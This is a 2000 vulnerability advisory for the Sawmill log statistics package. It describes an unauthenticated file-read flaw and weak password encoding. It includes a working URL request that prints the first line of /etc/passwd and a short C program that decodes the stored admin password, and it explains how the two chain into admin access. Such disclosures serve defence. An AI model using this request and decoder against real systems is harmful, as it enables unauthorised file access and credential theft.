Title: Arbitrary file read & weak password encryption flower fire sawmill v5.0.21
Author: Larry W. Cashdollar, @_larry0
Date: 2000-06-27
CVE-ID:[CVE-2000-0588][CVE-2000-0589]
Download Site: http://www.flowerfire.com/sawmill
Vendor: FlowerFire
Vendor Notified: 2000-06-27
Vendor Contact: https://www.sawmill.net/
Advisory: http://www.vapid.dhs.org/advisories/sawmill-advisory.txt
Description: SawMill is a site log statistics package for UNIX, Windows and MacOS.
Vulnerability:
In my test configuration, I have sawmill listening on port 8987 of my webserver. I noticed two things.
Dangerous
1) You can get sawmill to read you the first line of any (if run as nobody) world readable files without needing to authenticate first.
The following will print the first line of /etc/passwd:
http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
You can imagine how much more fun this would be if it was launched as root. Which it should not and does not need to be.
More Danger
2) The password is stored with a weak hash algorithm and can be decrypted using the attached C program. This is dangerous because the previous security hole will allow you to read the first line of the sawmill/SawmillInfo/SawmillPassword decrypt the password and access the site statistics, reconfigure sawmill. Along with the ability to browse the remote machines drive contents. If this is being run as root then the attacker can specify root readonly files as log files and read most if not all of their contents.
file info: sawmill5.0.21trial_x86_linux.tar.gz
I have notified the vendor and they were very responsive and are currently working on a fix
Exploit Code:
/*Dehash password for Sawmill admin account.
Larry W. Cashdollar
lwc@vapid.dhs.org
http://vapid.dhs.org
usage ./decrypt cyphertext
*/
#include <stdio.h>
char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|"; char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
int
main (int argc, char **argv)
{
int x, y;
char cypher[128];
strncpy (cypher, argv[1], 128);
for (x = 0; x < strlen (cypher); x++) {
for (y = 0; y < strlen (encode); y++)
if (cypher[x] == encode[y]){
printf ("%c", alpha[y]);
break;
}
}
printf("\n\"+\" could also be a space [ ]\n");
}